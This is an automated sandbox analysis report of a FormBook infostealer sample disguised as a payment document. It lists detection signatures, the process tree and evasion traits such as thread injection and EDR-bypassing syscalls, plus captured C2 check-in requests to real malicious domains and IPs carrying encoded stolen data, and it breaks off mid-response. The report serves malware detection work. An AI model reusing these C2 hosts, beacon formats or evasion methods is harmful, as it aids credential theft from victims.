Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Copy #190922-001.exe

Overview

General Information

Sample name:Payment Copy #190922-001.exe
Analysis ID:1574653
MD5:6ad492e20a37cb8ae67231fa9059df17
SHA1:822ee5217bf832a320095b45a65c75d1f147bde8
SHA256:3c22db2dc305a5605630a009337d6dcf8ed36c132a5269b3fd6146a175813f67
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Xwizard DLL Sideloading
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

Process Tree

  • System is w11x64_office
  • Payment Copy #190922-001.exe (PID: 7888 cmdline: "C:\Users\user\Desktop\Payment Copy #190922-001.exe" MD5: 6AD492E20A37CB8AE67231FA9059DF17)
    • svchost.exe (PID: 8076 cmdline: "C:\Users\user\Desktop\Payment Copy #190922-001.exe" MD5: B96D1C078A724E31B6F98CDB999E47F6)
      • gXhpelxbquSwSp.exe (PID: 6880 cmdline: "C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xwizard.exe (PID: 4828 cmdline: "C:\Windows\SysWOW64\xwizard.exe" MD5: CE6B6D39FDAB5FB8D87953BAEB662132)
          • firefox.exe (PID: 6060 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 4E82C81BC54B7858AA507CA58D0E3FA2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Xwizard DLL Sideloading
            Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xwizard.exe", CommandLine: "C:\Windows\SysWOW64\xwizard.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe" , ParentImage: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe, ParentProcessId: 6880, ParentProcessName: gXhpelxbquSwSp.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xwizard.exe", ProcessId: 4828, ProcessName: xwizard.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", CommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", ParentImage: C:\Users\user\Desktop\Payment Copy #190922-001.exe, ParentProcessId: 7888, ParentProcessName: Payment Copy #190922-001.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", ProcessId: 8076, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", CommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", ParentImage: C:\Users\user\Desktop\Payment Copy #190922-001.exe, ParentProcessId: 7888, ParentProcessName: Payment Copy #190922-001.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", ProcessId: 8076, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-13T13:18:12.563243+010028554651A Network Trojan was detected192.168.2.2449777103.23.149.2880TCP
            2024-12-13T13:18:37.445528+010028554651A Network Trojan was detected192.168.2.244978884.32.84.3280TCP
            2024-12-13T13:18:52.731892+010028554651A Network Trojan was detected192.168.2.2449792172.67.155.21480TCP
            2024-12-13T13:19:08.144035+010028554651A Network Trojan was detected192.168.2.2449796199.59.243.22780TCP
            2024-12-13T13:19:23.813931+010028554651A Network Trojan was detected192.168.2.2449803199.59.243.22780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-13T13:18:29.342602+010028554641A Network Trojan was detected192.168.2.244978184.32.84.3280TCP
            2024-12-13T13:18:32.027554+010028554641A Network Trojan was detected192.168.2.244978584.32.84.3280TCP
            2024-12-13T13:18:33.730010+010028554641A Network Trojan was detected192.168.2.244978684.32.84.3280TCP
            2024-12-13T13:18:44.629294+010028554641A Network Trojan was detected192.168.2.2449789172.67.155.21480TCP
            2024-12-13T13:18:47.329255+010028554641A Network Trojan was detected192.168.2.2449790172.67.155.21480TCP
            2024-12-13T13:18:48.604997+010028554641A Network Trojan was detected192.168.2.2449791172.67.155.21480TCP
            2024-12-13T13:19:00.074872+010028554641A Network Trojan was detected192.168.2.2449793199.59.243.22780TCP
            2024-12-13T13:19:02.748122+010028554641A Network Trojan was detected192.168.2.2449794199.59.243.22780TCP
            2024-12-13T13:19:04.476937+010028554641A Network Trojan was detected192.168.2.2449795199.59.243.22780TCP
            2024-12-13T13:19:15.104234+010028554641A Network Trojan was detected192.168.2.2449797199.59.243.22780TCP
            2024-12-13T13:19:17.766303+010028554641A Network Trojan was detected192.168.2.2449799199.59.243.22780TCP
            2024-12-13T13:19:19.611952+010028554641A Network Trojan was detected192.168.2.2449801199.59.243.22780TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.telepzow.fit/oizn/Avira URL Cloud: Label: phishing
            Source: http://www.telepzow.fit/oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvfAvira URL Cloud: Label: phishing
            Multi AV Scanner detection for submitted file
            Source: Payment Copy #190922-001.exeReversingLabs: Detection: 36%
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12536524767.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12536605737.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.11674681590.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Payment Copy #190922-001.exeJoe Sandbox ML: detected
            Source: Payment Copy #190922-001.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gXhpelxbquSwSp.exe, 0000000E.00000000.11596619254.00000000003AE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Payment Copy #190922-001.exe, 00000000.00000003.11307708681.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Payment Copy #190922-001.exe, 00000000.00000003.11308525255.0000000004680000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11584291378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003236000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11582690162.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003100000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004810000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004946000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11677267845.0000000004654000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11675115446.00000000044A0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Payment Copy #190922-001.exe, 00000000.00000003.11307708681.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Payment Copy #190922-001.exe, 00000000.00000003.11308525255.0000000004680000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11584291378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003236000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11582690162.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003100000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004810000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004946000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11677267845.0000000004654000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11675115446.00000000044A0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: svchost.exe, 00000004.00000003.11642197334.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11641588647.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000003.11743289735.000000000134C000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.00000000060EC000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.11972919990.000000000A6AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.00000000060EC000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.11972919990.000000000A6AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000004.00000003.11642197334.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11641588647.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000003.11743289735.000000000134C000.00000004.00000001.00020000.00000000.sdmp

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.24:49788 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49785 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49790 -> 172.67.155.214:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.24:49777 -> 103.23.149.28:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49789 -> 172.67.155.214:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49794 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.24:49792 -> 172.67.155.214:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49799 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49781 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49797 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49801 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49793 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49791 -> 172.67.155.214:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49786 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.24:49796 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.24:49803 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49795 -> 199.59.243.227:80
            Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
            Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /jv64/?BTV4RR_=0rgj4Y9sgnjazUN/4YnNawpmVeS/0BjNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7w9E5vaK255EpQhtC5dNFByAd90Z0uMBeXk0=&Tr=F0udvf HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.y6h6kn.topUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: global trafficHTTP traffic detected: GET /z4qr/?BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvf HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.thesnusgang.funUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: global trafficHTTP traffic detected: GET /oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvf HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.telepzow.fitUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: global trafficHTTP traffic detected: GET /yeky/?BTV4RR_=7P22LBHaa1jf6nBK2o2gS6XOG6oCOldtUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadAxG5YrQIOX9iVafYKH1JxvTLehj3THGuTlQ=&Tr=F0udvf HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dnft.immoUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: global trafficHTTP traffic detected: GET /0sq9/?BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvf HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.deadshoy.techUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.0000000005ED2000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.0000000004C42000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.11972919990.000000000A492000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13409778514166452bscookie equals www.linkedin.com (Linkedin)
            Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: `t.www.linkedin.combscookiev20? equals www.linkedin.com (Linkedin)
            Source: global trafficDNS traffic detected: DNS query: srtb.msn.com
            Source: global trafficDNS traffic detected: DNS query: www.y6h6kn.top
            Source: global trafficDNS traffic detected: DNS query: www.thesnusgang.fun
            Source: global trafficDNS traffic detected: DNS query: www.telepzow.fit
            Source: global trafficDNS traffic detected: DNS query: www.dnft.immo
            Source: global trafficDNS traffic detected: DNS query: www.deadshoy.tech
            Source: unknownHTTP traffic detected: POST /z4qr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Content-Length: 204Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheHost: www.thesnusgang.funOrigin: http://www.thesnusgang.funReferer: http://www.thesnusgang.fun/z4qr/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0Data Raw: 42 54 56 34 52 52 5f 3d 34 62 78 41 73 39 57 49 63 7a 4a 6e 6a 65 78 77 47 70 30 76 65 57 6d 50 32 43 42 37 74 46 57 77 61 69 6a 44 37 33 4b 4c 61 45 48 2f 35 41 57 76 6f 53 79 7a 61 61 38 7a 76 37 57 62 4f 69 48 74 49 70 30 42 74 6b 30 53 39 76 70 4c 70 6f 71 6b 30 74 67 5a 76 53 57 4b 64 5a 76 33 75 51 49 72 36 38 54 32 61 31 61 51 58 64 46 37 46 6c 4c 53 33 45 63 2b 74 6b 78 37 77 4e 67 42 37 6b 4f 49 55 44 77 34 77 4d 67 67 70 2f 48 4e 30 2b 75 31 71 48 31 59 75 44 70 2b 76 38 77 65 77 56 57 42 59 45 62 48 35 54 64 62 66 74 6f 69 48 67 33 34 6f 44 6a 62 2f 64 67 35 63 6a 72 50 66 6a 38 53 5a 41 3d 3d Data Ascii: BTV4RR_=4bxAs9WIczJnjexwGp0veWmP2CB7tFWwaijD73KLaEH/5AWvoSyzaa8zv7WbOiHtIp0Btk0S9vpLpoqk0tgZvSWKdZv3uQIr68T2a1aQXdF7FlLS3Ec+tkx7wNgB7kOIUDw4wMggp/HN0+u1qH1YuDp+v8wewVWBYEbH5TdbftoiHg34oDjb/dg5cjrPfj8SZA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:18:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:18:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eAqeDgL%2B9IYgjwd35JsDeYRc520WXQ1tG0wOTC7AGli1LT4S6mCK7I3oeZyj%2FOYoIa8UazPBsoC1bJHcaux1YI4dkx3aeaByHXc2FnM2BZLEekPa%2FXJN8jwM82UgjRvx1pK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f15e6013cb98cbf-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1989&rtt_var=994&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=710&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:18:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qO%2BuBPeVrnha5YOePar4qkMlRazE%2BXp%2F%2FKUpLFZs6hYDmoEXNviCHd7y%2F7zBRgCf4V4OOhmThyA6tJT96Xy7mqk%2FXE9UpF0MmWEvj7x5H7Efgv0zB3jaVpTR3dOy6QLVxLdu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f15e611efe0de99-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1541&rtt_var=770&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=1082&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:18:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6vOCY2UsXyGnBoOqK6hB8vtFXVPltGmT3FfWL4dzuAzMxbCVO%2FW70q7dF%2FjIm8K4HVio%2B2nZ3dm1UgDmGdmpkcX3T%2BIM%2B1OCOBpAwE5TPZNGD3MqXuDnHdJAih0CTvXGK7x"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f15e6336e4c43bb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1703&rtt_var=851&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=440&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 